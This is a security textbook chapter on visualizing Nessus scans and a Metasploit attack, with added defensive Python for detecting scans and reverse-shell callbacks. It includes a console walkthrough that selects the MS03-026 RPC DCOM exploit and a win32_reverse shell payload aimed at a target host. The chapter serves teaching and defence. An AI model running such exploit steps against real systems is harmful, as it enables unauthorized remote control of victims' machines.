Security Data Visualization: Graphical Techniques for Network Analysis, Chapter 4 (Vulnerability Assessment and Exploitation)

The document discusses vulnerability assessment tools used by attackers to identify weaknesses in networked computers, highlighting the importance of tools like Nessus and Metasploit. It explains the phases of a typical vulnerability assessment, including port scanning and vulnerability testing, and emphasizes the need for timely patching to prevent exploitation. Additionally, it describes visualization techniques for analyzing network attacks and understanding the behavior of vulnerability assessment tools.

Chapter 4: Vulnerability Assessment and Exploitation

Copyright © 2007. No Starch Press, Incorporated. All rights reserved.
Conti, G. (2007). Security data visualization: Graphical techniques for network analysis. No Starch Press, Incorporated.
Created from inflibnet-ebooks on 2024-01-05 [Link].

Attackers use vulnerability assessment tools to rapidly find weaknesses in networked computers. These weaknesses are known vulnerabilities: flaws that security researchers have already discovered that allow an attacker to violate a computer’s security mechanisms. Vulnerabilities can take many forms, such as buffer overflows or input validation errors, but they always result in unintended behavior that subverts the security of the targeted system, usually by executing malicious code on the target machine. Although these vulnerabilities are common knowledge in the security community, users often delay patching their systems because of ignorance, apathy, or lack of resources, leaving their systems open to attack. Rather than manually attempting to identify and exploit vulnerable computers, attackers can employ tools such as Nessus ([Link]) and Metasploit ([Link]), which automate the attack process and draw on entire libraries of vulnerabilities that are updated regularly as new ones are discovered. Because of these strengths, both legitimate security professionals and attackers use these tools to probe and attack networks. Vulnerability assessment tools often combine network reconnaissance, usually port scans, with targeted attempts to identify and test vulnerabilities. Nessus, developed by Tenable Network Security ([Link]), is an extremely popular and powerful vulnerability assessment tool, which I’ll use in this chapter to demonstrate how vulnerability assessment works and how we can use visualization to analyze various network attacks. I’ll follow up this discussion with a walk-through of Metasploit, an open source platform for developing and executing exploit code. I’ll then use visualization to closely examine the behavior of a Metasploit attack that follows a common pattern: exploitation of a known vulnerability, transfer of a malicious payload, and subsequent compromise of the targeted host.

Nessus
Nessus began as a freely distributed, open source project. It uses a client-server architecture, meaning that there are two components: a client that controls the vulnerability assessment and a server that conducts it. Nessus uses a library of plug-ins, small programs each designed to test a given vulnerability, to evaluate the target system. Figure 4-1 shows this plug-in library displayed with NessusWX ([Link]), a Nessus client for Windows created by Victor Kirhenshtein and Nicolas Pouvesle.

Figure 4-1: A list of Nessus plug-ins displayed with the NessusWX client


In addition to Nessus, there are a number of other well-regarded vulnerability assessment tools, including eEye’s Retina and Core Security Technologies’ CORE IMPACT. See [Link] for more information on these and similar tools.

Version 2.x remains free, but versions 3.x and later are commercial products. I’ll be using
version 2.x for my analysis.

You can find a comprehensive list of Nessus plug-ins at [Link]

A typical vulnerability assessment occurs in two phases. In the first
stage, a port scan probes for listening ports. In the second stage, Nessus
intelligently selects from its list of plug-ins based on the target machine.
For example, Nessus won’t test a Unix machine for Windows-specific vul-
nerabilities. As the vulnerability assessment takes place, Nessus provides a
continuous update on the vulnerabilities it finds, including a count of holes
(exploitable vulnerabilities) and active ports (Figure 4-2). At the end of the
scan, Nessus provides a detailed report listing the specific vulnerabilities it
found as well as details on how those vulnerabilities can be secured.
As I begin an attack using Nessus, let’s capture some packets and
observe the probe from the target’s perspective. By gaining a better under-
standing of what attacks look like, we can apply that knowledge in later
chapters as we examine real-world network traffic.

Figure 4-2: During the Nessus vulnerability assessment, the attacker receives continuous updates on the target’s vulnerabilities.

Dissecting a Nessus Vulnerability Assessment


In both real-world attacks and this simulated attack, the defender must depend on the data he or she can collect. In the following example, I conducted a Nessus scan against a partially patched Windows XP host and used Wireshark on that host to capture every packet of the scan. I’ll use these packets to dissect how Nessus operates as well as gain insight into specific attack techniques.
Highly interactive visualization systems are very useful to analysts because they allow dynamic exploration, not just static views of data. Figure 4-3 shows the interface of one interactive system, RUMINT ([Link]). (You saw RUMINT’s parallel coordinate plot visualizations in Chapter 3.) RUMINT uses a VCR-like interface to enable analysts to visually play back traffic from any point within the set of packets. The user simply loads the packet capture, opens the appropriate visualization windows, and clicks the Play button.


RUMINT is intelligence community slang for rumor intelligence.

Some network tools literally play back packets by resending them on a network. While
RUMINT might provide this ability at some point in the future, here I am talking about
plotting packet data in visualization windows.

When I examine an unfamiliar dataset for the first time, I play it back in its entirety to get a feel for the big-picture context. In other words, I load the new dataset into RUMINT, open a visualization window or two (such as the parallel coordinate plot) using the View menu, and then click the Play button, which causes RUMINT to update each of the visualization displays based on the packet data. All we know about Nessus initially is that it conducts a port scan and then attempts to find vulnerabilities in the ports that are open. As I analyze the dataset, my strategy will be to precisely isolate the port scan and then remove it from the visualizations so I can focus on the vulnerability phase of the attack. The dataset I captured from the Nessus scan contains 36,156 packets. As we did in Chapter 3, let’s focus on the 18,708 inbound packets. While the host’s responses also contain potentially useful information, I’m more concerned with learning about how Nessus conducts its probing.

Figure 4-3: Using RUMINT’s VCR-like interface to interact with our visualizations

Using a Packet Length Visualization

Port scans generate a large number of small, similar packets. These packets typically carry no payload, which is what keeps scans fast. Let’s use this fact to visualize the dataset in an efficient way, one that should still help us distinguish between the first phase of the attack (the port scan) and the second (the exploit attempts). Figure 4-4 shows my approach. Similar to a horizontal bar graph, this visualization plots packet lengths, one packet per horizontal row. Since we are looking at data transmitted across an Ethernet network, we know that 1,518 bytes is the largest permissible size for an individual frame, so we’ll use this as the maximum value of the horizontal (packet length) axis. Let’s use the VCR interface to play back the traffic and display it using the packet length visualization.

NOTE While 1,518 bytes is the maximum size allowed by the original Ethernet specification,
newer specifications allow “jumbo frames” of 9,000 bytes. However, it is unlikely that
you will see jumbo frames on typical home and business networks.

[Figure 4-4 axes: vertical, packet number from 1 to n; horizontal, packet length from 0 to 1518 bytes]

Figure 4-4: Packet length visualization. It displays each packet as a horizontal bar with a length that is proportional to the given packet’s length. I’ve colored each bar based on the protocol of the packet.

Finding and Removing the Port Scan


When I play back the entire dataset into the packet length visualization, it appears that Nessus conducted the port scan using the first 15,467 packets. I make this determination based on the solid green bar, which represents very small TCP packets, shown in Figure 4-5. At packet 15,468, the visualization abruptly changes to a mixture of varied protocols and lengths. You can see the change in the main image, as well as in the detail regions.

[Figure 4-5 axes: packet length from 0 to 1000 bytes; regions labeled Port scan phase and Attack phase]

Figure 4-5: Using the packet length visualization to find the port scan within the Nessus vulnerability assessment. This image shows the transition from the initial port scan, the solid green bar at the top of the screen, to the port-specific attack phase.

I want to remove the port scan from the visualization because it generates a lot of noise and consumes valuable screen space, CPU time, and memory. However, while I’m reasonably sure that I’ve correctly identified the scan, let’s use another visualization technique to verify that. Figure 4-6 shows a parallel coordinate plot of the packets from the beginning of the dataset to the transition point we noted at packet 15,468. This graph shows that a single attacker probed a wide range of ports on the target machine. As you examine the image, note that Nessus used a continuous series of source TCP ports. Clues such as port allocation give us insight into the operating system of the attacker (in this case Slackware Linux, [Link]) as well as into the network programming techniques employed by the attack tool’s developers. Ephemeral-port allocation is only a hint, though: it varies between OS versions, and a tool can bind its own source ports, so treat it as corroborating evidence rather than proof. Note how Nessus compares to our earlier visualizations of port scan software in Figure 3-9. Now that we’ve safely identified the port scan, let’s continue our analysis.

[Figure 4-6 axes, left to right: source IP address, TCP source port, TCP destination port, destination IP address]

Figure 4-6: Using a parallel coordinate plot to confirm the port scan. Notice the sequential probing of destination ports.
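The two clues this chapter reads off the pictures, a long run of tiny TCP packets and ports that step by one, can also be tested directly on the packet records. The following Python is an added example written for this edition, not Conti’s code from the book or any part of RUMINT. It operates on a small constructed capture rather than the 36,156-packet dataset, and the thresholds SCAN_MAX_LEN and MIN_SCAN_RUN, like the attack-phase traffic it builds, are assumptions made here.

```python
"""Locate the Nessus port-scan phase in a packet capture the way the chapter
does visually: a long run of small, payload-free TCP packets whose ports
step by one. Added example; all packets below are constructed."""
from dataclasses import dataclass
from typing import List, Optional, Tuple

ETHERNET_MAX = 1518   # largest standard Ethernet frame, the chapter's axis maximum


@dataclass(frozen=True)
class Packet:
    proto: str    # "TCP", "UDP" or "ICMP"
    length: int   # bytes on the wire
    sport: int
    dport: int


# Assumptions for this example: a SYN probe with TCP options is at most 66
# bytes on the wire, and we only call something a scan if it runs for 50+
# consecutive packets.
SCAN_MAX_LEN = 66
MIN_SCAN_RUN = 50


def length_bar(p: Packet, width: int = 60) -> str:
    """One row of the packet length visualization: '#' characters proportional
    to packet length, with the protocol as a text stand-in for the bar color."""
    n = round(width * min(p.length, ETHERNET_MAX) / ETHERNET_MAX)
    return ("#" * n).ljust(width) + f" {p.proto:<4} {p.length:>4}"


def find_scan_run(packets: List[Packet]) -> Optional[Tuple[int, int]]:
    """Return [start, end) of the longest run of small TCP packets, or None if
    no run reaches MIN_SCAN_RUN."""
    best: Optional[Tuple[int, int]] = None
    start: Optional[int] = None
    for i in range(len(packets) + 1):          # the extra index flushes a run at the tail
        small = (i < len(packets) and packets[i].proto == "TCP"
                 and packets[i].length <= SCAN_MAX_LEN)
        if small and start is None:
            start = i
        elif not small and start is not None:
            if best is None or (i - start) > (best[1] - best[0]):
                best = (start, i)
            start = None
    if best is not None and best[1] - best[0] >= MIN_SCAN_RUN:
        return best
    return None


def sequential_fraction(packets: List[Packet], start: int, end: int, field: str) -> float:
    """Fraction of consecutive packets in [start, end) whose port in `field`
    advances by exactly one: the straight diagonal of Figure 4-6 as a number."""
    vals = [getattr(p, field) for p in packets[start:end]]
    steps = [b - a for a, b in zip(vals, vals[1:])]
    return sum(1 for s in steps if s == 1) / len(steps) if steps else 0.0


def split_phases(packets: List[Packet]) -> Tuple[List[Packet], List[Packet]]:
    """Separate the scan from everything else so the scan can be dropped from
    later views, as the chapter does before studying the attack phase."""
    run = find_scan_run(packets)
    if run is None:
        return [], list(packets)
    s, e = run
    return packets[s:e], packets[:s] + packets[e:]


def build_capture() -> List[Packet]:
    """Constructed inbound traffic: 1,000 SYN probes walking destination ports
    1..1000 from ascending source ports, then a mixed-length attack phase aimed
    at 445, 139 and 135 with the occasional ICMP packet."""
    scan = [Packet("TCP", 60, 32768 + i, 1 + i) for i in range(1000)]
    attack: List[Packet] = []
    for i in range(200):
        dport = (445, 139, 135)[i % 3]
        attack.append(Packet("TCP", 80 + (i * 37) % 1400, 40000 + (i * 7) % 2000, dport))
        if i % 25 == 0:
            attack.append(Packet("ICMP", 74, 0, 0))
    return scan + attack


if __name__ == "__main__":
    cap = build_capture()
    run = find_scan_run(cap)
    print("scan packets:", run, "dport sequential:",
          sequential_fraction(cap, run[0], run[1], "dport"))
    scan, rest = split_phases(cap)
    for p in scan[:2] + rest[:4]:
        print(length_bar(p))
```

On a real capture the run boundary is rarely as clean as 15,467 versus 15,468: SYN/ACK retransmissions and RSTs from the target interleave with the probes, so run the split on inbound packets only, as the chapter does, and check the sequential fraction of both source and destination ports before discarding the run.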

Animating Packets
Let’s examine an animated display for the Nessus dataset. Figure 4-7 com-
bines the static nature of the parallel coordinate plot with packet animation.

[Figure 4-7 layout (top and bottom images): a left marker pane for TCP source port running from packet n to packet 1, a center two-axis plot of TCP source port and TCP destination port each scaled 0 to 65535, and a right marker pane for TCP destination port running from packet 1 to packet n]

Figure 4-7: Animating the playback of the packets. The center section is a two-column parallel coordinate plot, and the side sections use animated markers for packets. The top image depicts the visualization after the arrival of five packets. The bottom image shows how the display is updated after the arrival of three new packets.

This is important because parallel plots suffer from a significant shortcoming: If packet header fields all have similar data, the resulting plots will be identical. One thousand packets could follow the same path and you would never know. The combined visualization, developed by Sven Krasser and shown in Figure 4-7, solves this problem. The center region is a typical two-column parallel coordinate plot. While we could plot any type of data from the packet header fields on these axes, I’ve used TCP source and destination ports. You may wish to explore different combinations; RUMINT supports 19 header fields.
As each packet arrives, RUMINT plots the line segment as with a normal parallel coordinate plot, but the tool also creates markers on each of the side panes, one pair per packet (Figure 4-7, top). These markers start out at the end of the newly plotted parallel coordinate plot line segment. As additional packets arrive, existing markers are shifted slightly outward toward the edge of the visualization (Figure 4-7, bottom). When the markers eventually reach the end of the display, they disappear. The result of looping through this process is an animated display that allows you to see how the two axis values change with each packet. In other words, we can now compare the behavior of each packet against the others. For example, increased activity on a particular port will result in an increased number of markers issuing forth from a constant point on the respective axis. Note the use of color for the markers. By assigning color based on a third variable, we increase the amount of information shown in the display. Now, let’s use the combined visualization technique to look at the Nessus dataset.
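To make the marker mechanics concrete, here is a small model of the combined display described above. It is an added example for this edition, not RUMINT’s source or anything from the book: it keeps a list of line segments for the center plot and a queue of markers per side pane, pushes every marker one column outward per packet, and drops markers that reach the pane edge. PANE_WIDTH and the packets it replays are assumptions.

```python
"""Model of the combined parallel-coordinate/animated-marker display: each
packet draws a line between the source-port and destination-port axes and
drops one marker on each side pane; every later packet pushes the existing
markers one column outward until they fall off the edge. Added example."""
from collections import Counter, deque
from dataclasses import dataclass, field
from typing import Deque, Iterable, List, Tuple

PANE_WIDTH = 8   # columns in each side pane (assumption; RUMINT works in pixels)


@dataclass
class Marker:
    value: int        # axis value (here a port) the marker was created at
    color: str        # the third variable, here the protocol name
    offset: int = 0   # columns out from the axis; PANE_WIDTH means off-screen


@dataclass
class Display:
    lines: List[Tuple[int, int]] = field(default_factory=list)   # center-plot segments
    left: Deque[Marker] = field(default_factory=deque)          # source-port markers
    right: Deque[Marker] = field(default_factory=deque)         # destination-port markers

    def add_packet(self, sport: int, dport: int, proto: str) -> None:
        """Advance the animation by one packet."""
        for pane in (self.left, self.right):
            for m in pane:
                m.offset += 1
            while pane and pane[0].offset >= PANE_WIDTH:   # oldest marker sits at the front
                pane.popleft()
        self.lines.append((sport, dport))
        self.left.append(Marker(sport, proto))
        self.right.append(Marker(dport, proto))

    def busiest_destination(self) -> Tuple[int, int]:
        """Destination port with the most markers still on screen, the
        'constant point issuing markers' the chapter describes. Returns (port, count)."""
        counts = Counter(m.value for m in self.right)
        return counts.most_common(1)[0] if counts else (-1, 0)

    def distinct_lines(self) -> int:
        """How many different paths the static center plot actually shows."""
        return len(set(self.lines))


def replay(packets: Iterable[Tuple[int, int, str]]) -> Display:
    """Feed (sport, dport, proto) tuples through the display in order."""
    d = Display()
    for sport, dport, proto in packets:
        d.add_packet(sport, dport, proto)
    return d


if __name__ == "__main__":
    # Constructed: nine identical packets, invisible as repetition in a plain
    # parallel coordinate plot but obvious as a stream of markers.
    d = replay([(1063, 445, "TCP")] * 9)
    print("distinct lines:", d.distinct_lines(), "markers on right pane:", len(d.right))
    print("busiest destination:", d.busiest_destination())
```

The point of the model is the last two numbers: nine packets on the same path collapse to one line in the center plot but leave a full pane of markers on the right, which is exactly the repetition the static plot hides.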

Exploring the Remaining Activity


When analyzing datasets, the trick is to identify the “interesting” aspects for further inspection. Take a look at Figure 4-8. What stands out? You should see a large diagonal green band in the middle of the display and fainter diagonal lines on both the left and right sides. The green band and the two diagonal lines are the port scan we just identified. In the figure, I zoomed in on an additional region that I found interesting. (The area inside the red square in the main image is shown in greater detail below.) Beyond the regularly spaced port scan traffic, Nessus generated a great deal of activity targeting the lower ports. To focus on this, I filtered out all the traffic with a destination port greater than 500, zoomed in, and then ran the visualization once more. My decision to use 500 was somewhat arbitrary; you might also choose to filter out ports greater than 1024, which would allow you to focus on the privileged ports from 0 to 1023. However, I noticed that there was a great deal of activity on ports below 500, and filtering in this way provides about twice as much detail as filtering below 1024. Upon closer inspection, the image didn’t reveal any additional packets with values less than 100, so I ran the visualization again to filter out any packets with TCP destination ports less than 100 or greater than 500. I did this to maximize the detail displayed in the available screen space. Figure 4-9 shows the result.

See Sven Krasser, Greg Conti, Julian Grizzard, Jeff Gribschaw, and Henry Owen’s “Real-Time and Forensic Network Data Analysis Using Animated and Coordinated Visualization” from the 2005 IEEE Information Assurance Workshop for more details on this technique.

[Figure 4-8 axes: TCP source port and TCP destination port, each from 0 to 65535]

Figure 4-8: Using the combined visualization technique to view the entire dataset. Notice the cluster of activity targeting the low ports.

[Figure 4-9 axes: TCP source port from 0 to 65535; TCP destination port from 100 to 500]

Figure 4-9: Filtering out everything except ports 100 to 500. By filtering and zooming in, we see two clusters of Nessus activity, but the display is clouded by the port scan.

Identifying the Specific Ports


Filtering and zooming in shows us that Nessus seemed to target several low ports (Figure 4-9), but the display is heavily occluded by the port scan. By first identifying the scan (Figure 4-10) and then removing it from the display (Figure 4-11), we can easily determine the specific ports that were targeted: 445, 139, and 135. What makes these ports significant? Ports 445 and 139 are associated with Windows file sharing, and port 135 is used for locating Windows Distributed Component Object Model (DCOM) services. (More precisely, 139 is the NetBIOS session service carrying SMB, 445 is SMB directly over TCP, and 135 is the RPC endpoint mapper that DCOM clients query.)

[Figure 4-10 axes: TCP source port from 0 to 65535; TCP destination port from 100 to 500]

Figure 4-10: Isolating the port scan. Notice the diagonal line on the right pane that shows a series of destination ports being probed in succession.
DCOM services are software components that communicate across a network, and each of these services has a litany of well-known vulnerabilities. Nessus has plug-ins for these vulnerabilities and tests the target computer for each of them. In this case the target computer had a number of serious vulnerabilities (Figure 4-12). Notice the high number of reported vulnerabilities on TCP ports 445, 139, and 135; this matches our observation of heavy activity on those same ports.

[Figure 4-11 axes: TCP source port from 0 to 65535; TCP destination port from 100 to 500]

Figure 4-11: Removing the port scan from the display. Notice that Nessus focused a great deal of attention on ports 445, 139, and 135.

Let’s take a closer look at port 445. Figure 4-13 uses a simple technique that I call a text rainfall, set to display only printable ASCII strings of 5 characters or more. The text rainfall displays the contents of the packet as text, one packet per line. If a byte is a printable ASCII character, it is printed directly; for byte values that don’t have an easily printable ASCII representation, the text rainfall prints a period character. The text rainfall allows an analyst to compare the payloads of 25 to 50 packets at one time, and it is extremely useful for cases in which the communication protocol uses unencrypted human-readable commands, which are common. Notice that in these packets, Nessus has identified the target machine’s name (CRAYII) and is currently evaluating ADMINISTRATOR access. One drawback is that a text rainfall can only show about 80 to 120 characters per packet at one time on a typical monitor; the rest is either truncated, or the user must scroll horizontally to see it. In most instances this isn’t a major disadvantage, because many human-readable protocol commands typically occur right after packet headers and are easily visible in the first 80 to 120 characters. I’ll end my analysis here, but an interesting extension would be to generate a catalog of the visual signatures created by each plug-in. With these signatures, I believe you could rapidly detect each type of exploitation attempt, and perhaps even determine its success or failure, in other similar attacks.

Of course, you always have the option of getting a bigger monitor.

Figure 4-12: Vulnerabilities reported by Nessus. Notice the large number of vulnerabilities reported on TCP ports 135, 139, and 445.

Figure 4-13: A text rainfall visualization of the Nessus vulnerability assessment. Notice that the rainfall helps you see the attacks in action.
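As an added example for this edition (not Conti’s code or RUMINT’s), the following Python builds a text rainfall from raw payloads: printable bytes kept, everything else rendered as a period, and a strings-style filter for runs of 5 or more characters. The SMB-like payloads are constructed to resemble the session the chapter describes; they are not captured data. One caveat the chapter’s figure does not show is handled too: once SMB negotiates Unicode, names such as the account being tested travel as UTF-16LE, which an ASCII-only rainfall renders as A.D.M.I.N..., so a second pass recovers those wide strings.

```python
"""Text rainfall: one line per packet, printable ASCII kept and every other
byte shown as '.', plus a strings-style filter that keeps only runs of 5+
printable characters. Added example; the SMB-like payloads are constructed."""
from typing import Iterable, List

MIN_RUN = 5   # the chapter's threshold: strings of 5 characters or more
WIDTH = 80    # columns visible on a typical monitor before truncation


def is_printable(b: int) -> bool:
    return 0x20 <= b < 0x7F


def rainfall_line(payload: bytes, width: int = WIDTH) -> str:
    """Render one payload: printable bytes verbatim, the rest as '.', cut at width."""
    return "".join(chr(b) if is_printable(b) else "." for b in payload[:width])


def printable_runs(payload: bytes, min_run: int = MIN_RUN) -> List[str]:
    """strings(1)-style view: maximal runs of printable ASCII with length >= min_run."""
    runs: List[str] = []
    cur: List[str] = []
    for b in payload + b"\x00":          # sentinel flushes a trailing run
        if is_printable(b):
            cur.append(chr(b))
            continue
        if len(cur) >= min_run:
            runs.append("".join(cur))
        cur = []
    return runs


def wide_runs(payload: bytes, min_run: int = MIN_RUN) -> List[str]:
    """UTF-16LE ASCII text (what SMB uses once Unicode is negotiated) shows in
    an ASCII rainfall as 'A.D.M.I.N...'; this pass recovers such runs."""
    runs: List[str] = []
    cur: List[str] = []
    i = 0
    while i + 1 < len(payload):
        lo, hi = payload[i], payload[i + 1]
        if is_printable(lo) and hi == 0:
            cur.append(chr(lo))
            i += 2
            continue
        if len(cur) >= min_run:
            runs.append("".join(cur))
        cur = []
        i += 1                            # resynchronise one byte at a time
    if len(cur) >= min_run:
        runs.append("".join(cur))
    return runs


def rainfall(payloads: Iterable[bytes], min_run: int = MIN_RUN, width: int = WIDTH) -> List[str]:
    """One numbered line per packet that contains at least one qualifying
    string, the filter the chapter applied in Figure 4-13."""
    return [f"{i:5d} {rainfall_line(p, width)}"
            for i, p in enumerate(payloads, 1) if printable_runs(p, min_run)]


SMB_HDR = b"\x00\x00\x00\x40\xffSMB"   # constructed NetBIOS length prefix plus the SMB magic


def build_payloads() -> List[bytes]:
    """Constructed payloads: dialect negotiation, an ASCII host name, a UTF-16LE
    account name, and a header-only packet with nothing readable."""
    return [
        SMB_HDR + b"\x72" + b"\x00" * 8 + b"\x02PC NETWORK PROGRAM 1.0\x00\x02NT LM 0.12\x00",
        SMB_HDR + b"\x73" + b"\x00" * 8 + b"CRAYII\x00\x00WORKGROUP\x00",
        SMB_HDR + b"\x73" + b"\x00" * 8 + "ADMINISTRATOR".encode("utf-16-le") + b"\x00\x00",
        bytes(range(32)),
    ]


if __name__ == "__main__":
    for line in rainfall(build_payloads()):
        print(line)
    for p in build_payloads():
        print(printable_runs(p), wide_runs(p))
```

The third constructed packet is the one to notice: the ASCII pass drops it entirely, so a rainfall filtered on 5-character ASCII strings would never show the account name, while wide_runs recovers ADMINISTRATOR. When you catalog plug-in signatures as the chapter suggests, run both passes or the Unicode-negotiated half of an SMB session will be missing from the catalog.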
We’ve just seen how Nessus performs vulnerability assessments, but
Nessus stops short of actually delivering a malicious payload, a key com-
ponent of real-world attacks. The next section covers Metasploit, which is
designed to do just that.

Metasploit
Metasploit is an advanced open source platform for developing, testing, and using exploit code ([Link]). It gives both seasoned attackers and novices the ability to easily execute sophisticated exploits. An attacker first chooses from a library of exploits, code that takes advantage of a known vulnerability to bypass security. Second, the attacker pairs the chosen exploit with a payload, the code that is executed after a successful attack. As of this writing, Metasploit includes 143 different exploits and 75 different payloads. Developed by the Metasploit Project and first released in 2003, Metasploit is a significant advancement in hacking. Previously, exploits were hard coded with individual payloads, and this inflexibility greatly reduced an attacker’s ability to adapt and propagate attacks. Using Metasploit, however, attackers can mix, match, and share attacks far more easily.
Nessus directly integrates port scanning into its probing, but Metasploit assumes you have already identified ports of interest. Unless a machine is up to date on security patches or protected behind a well-tuned firewall, chances are an attacker can use Metasploit to successfully gain unauthorized access. In this section, we’ll look at ways to visualize Metasploit attacks both before and after compromise to help understand how they work. In this example, assume that I’ve already used Nmap to probe a target computer and have found a Microsoft Remote Procedure Call (RPC) DCOM service running on port 135. This assumption does not require a leap of faith, as this service is commonly used by Windows operating systems. Unfortunately, attackers discovered that by sending specially crafted input to this port (the exploit), they could execute code of their choosing (the payload) on the target machine. I chose this vulnerability as an example because it is well known and illustrates the key aspects of an attack. Security experts discover new network service vulnerabilities every day, but these attacks all tend to follow the same basic pattern: exploitation of a vulnerability to seize privileged access on a target machine, delivery and execution of a payload, and some sort of follow-up unauthorized activity. My example using the RPC DCOM vulnerability will cover all three facets.

Metasploit is powerful and can quickly get you into a lot of trouble. Make sure you are fully authorized before using it on any network.

You can find the detailed Microsoft Security Bulletin on this vulnerability (MS03-026) at [Link].

Choosing an Exploit
An attacker begins by using Metasploit’s show exploits command to search for an appropriate exploit. The following is a partial listing of available exploits.

msf > show exploits

Metasploit Framework Loaded Exploits
====================================
...
  msasn1_ms04_007_killbill       Microsoft ASN.1 Library Bitstring Heap Overflow
  msmq_deleteobject_ms05_017     Microsoft Message Queueing Service MS05-017
  msrpc_dcom_ms03_026            Microsoft RPC DCOM MS03-026
  mssql2000_preauthentication    MSSQL 2000/MSDE Hello Buffer Overflow
  mssql2000_resolution           MSSQL 2000/MSDE Resolution Overflow
  netterm_netftpd_user_overflow  NetTerm NetFTPD USER Buffer Overflow
  novell_messenger_acceptlang    Novell Messenger Server 2.0 Accept-Language Overflow
  openview_connectednodes_exec   HP Openview [Link] Remote Command Execution
  openview_omniback              HP OpenView Omniback II Command Execution
  oracle9i_xdb_ftp               Oracle 9i XDB FTP UNLOCK Overflow (win32)
...

With the knowledge that Metasploit’s msrpc_dcom_ms03_026 exploit (third entry in the listing above) will likely be effective against the port 135 RPC DCOM service identified by Nmap, the attacker uses the use msrpc_dcom_ms03_026 command to select it. Because each exploit requires additional information before it can run, the attacker then uses the show options command to check its requirements.

msf > use msrpc_dcom_ms03_026
msf msrpc_dcom_ms03_026 > show options

Exploit Options
===============

  Exploit:    Name      Default    Description
  --------    ------    -------    ------------------
  required    RHOST                The target address
  required    RPORT     135        The target port

  Target: Windows NT SP3-6a/2K/XP/2K3 English ALL

For the uninitiated, these results from the show options command may appear a bit cryptic. They show us that the exploit requires the IP address of the target host (RHOST) and the port of the RPC service (RPORT). Note that RPORT is already set to 135 by default, so all we need to do is use the set command to set the target’s IP address (which we identified as [Link] during our initial Nmap scan).

msf msrpc_dcom_ms03_026 > set RHOST [Link]
RHOST -> [Link]

Choosing a Payload
The next step is to select the payload we would like to pair with the exploit,
using the show payloads command.

msf msrpc_dcom_ms03_026 > show payloads

Metasploit Framework Usable Payloads
====================================
...
  win32_exec                   Windows Execute Command
  win32_passivex               Windows PassiveX ActiveX Injection Payload
  win32_passivex_meterpreter   Windows PassiveX ActiveX Inject Meterpreter Payload
  win32_passivex_stg           Windows Staged PassiveX Shell
  win32_passivex_vncinject     Windows PassiveX ActiveX Inject VNC Server Payload
  win32_reverse                Windows Reverse Shell
  win32_reverse_dllinject      Windows Reverse DLL Inject
  win32_reverse_meterpreter    Windows Reverse Meterpreter DLL Inject
  win32_reverse_ord            Windows Staged Reverse Ordinal Shell
  win32_reverse_ord_vncinject  Windows Reverse Ordinal VNC Server Inject
...

Notice that because I chose a Windows exploit, Metasploit lists only Windows-compatible payloads. After successful exploitation, these payloads allow an attacker to do things like upload and execute malicious programs on the target computer, run a Virtual Network Computing (VNC) server to remotely control the target’s desktop, add unauthorized users, or gain a shell (i.e., command-line access) on the target machine. I’d like the ability to interact with the target using the command line, so I used the set PAYLOAD command to choose the Windows Reverse Shell (win32_reverse in the listing above). Then I’ll use the show options command to determine whether the payload requires any additional information.

msf msrpc_dcom_ms03_026 > set PAYLOAD win32_reverse
PAYLOAD -> win32_reverse
msf msrpc_dcom_ms03_026(win32_reverse) > show options

Exploit and Payload Options
===========================

  Exploit:    Name      Default        Description
  --------    ------    -------        ------------------
  required    RHOST     [Link]         The target address
  required    RPORT     135            The target port

  Payload:    Name      Default    Description
  --------    ------    -------    ------------------------------------------
  required    EXITFUNC  thread     Exit technique: "process", "thread", "seh"
  required    LHOST                Local address to receive connection
  required    LPORT     4321       Local port to receive connection

  Target: Windows NT SP3-6a/2K/XP/2K3 English ALL

The payload requires that I choose which local host address should receive the reverse shell connection (LHOST). A reverse shell has the compromised target connect outward to the attacker, which is what lets it through firewalls that block inbound connections but permit outbound ones. I set this value to the IP address of the attacking machine ([Link]) using the set LHOST command. I won’t alter the default local port that will receive the connection (LPORT), which is 4321. The commonplace use of default values brings up an important point: Many attackers will not deviate from these defaults. When attackers rely on default values, they make their attacks easier to detect and respond to.
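From the defender’s side, the default LPORT is exactly the kind of clue the previous paragraph describes. The following detector is an added example for this edition (not from Metasploit or the book) that runs over constructed NetFlow-style records: it remembers which peers connected to a host on ports 135, 139 or 445 and alerts when that host opens a connection back to such a peer within WINDOW_SEC, rating callbacks to a known default port higher. The port sets, the window and the flow format are assumptions.

```python
"""Catch a default-configured reverse shell from the defender's side: the
target accepts a connection on TCP/135 and, moments later, opens an outbound
connection back to that same peer on Metasploit's default LPORT 4321. Added
example; flow records are constructed and the format is a NetFlow-like assumption."""
from dataclasses import dataclass
from typing import Dict, List, Tuple

DEFAULT_LPORTS = {4321}                 # win32_reverse default in the chapter's Metasploit version
EXPLOITED_SERVICES = {135, 139, 445}    # RPC endpoint mapper and SMB ports Nessus hammered
WINDOW_SEC = 30.0                       # assumption: the callback follows the exploit within seconds


@dataclass(frozen=True)
class Flow:
    ts: float
    src: str
    sport: int
    dst: str
    dport: int


def reverse_shell_alerts(flows: List[Flow]) -> List[Dict[str, object]]:
    """Alert on an outbound flow from victim V to peer A when A contacted V on an
    exploited service port within WINDOW_SEC. A callback on a known default port
    is rated high; any other callback to the same peer is still reported as medium."""
    last_inbound: Dict[Tuple[str, str], Tuple[float, int]] = {}   # (victim, peer) -> (ts, dport)
    alerts: List[Dict[str, object]] = []
    for f in sorted(flows, key=lambda x: x.ts):
        if f.dport in EXPLOITED_SERVICES:
            last_inbound[(f.dst, f.src)] = (f.ts, f.dport)
        hit = last_inbound.get((f.src, f.dst))
        if hit is not None and 0 <= f.ts - hit[0] <= WINDOW_SEC:
            alerts.append({
                "victim": f.src,
                "attacker": f.dst,
                "exploited_port": hit[1],
                "callback_port": f.dport,
                "delay_sec": round(f.ts - hit[0], 1),
                "confidence": "high" if f.dport in DEFAULT_LPORTS else "medium",
            })
    return alerts


def build_flows() -> List[Flow]:
    """Constructed timeline on a lab network: normal SMB use, the exploit and
    its callback on the default port, a retry with a custom port, and a stray
    connection to 4321 with no exploit before it (must not alert)."""
    victim, attacker, fileserver, web = "10.0.0.7", "10.0.0.99", "10.0.0.1", "10.0.0.2"
    return [
        Flow(100.0, fileserver, 50000, victim, 445),   # legitimate client hits the victim's share
        Flow(105.0, victim, 1055, web, 80),            # unrelated outbound browsing
        Flow(200.0, attacker, 41000, victim, 135),     # MS03-026 exploit delivered to RPC/DCOM
        Flow(202.5, victim, 1063, attacker, 4321),     # win32_reverse calls home on the default LPORT
        Flow(300.0, attacker, 41001, victim, 135),     # second attempt...
        Flow(301.0, victim, 1064, attacker, 8443),     # ...with a non-default LPORT
        Flow(400.0, victim, 1070, attacker, 4321),     # too long after any exploit: no alert
    ]


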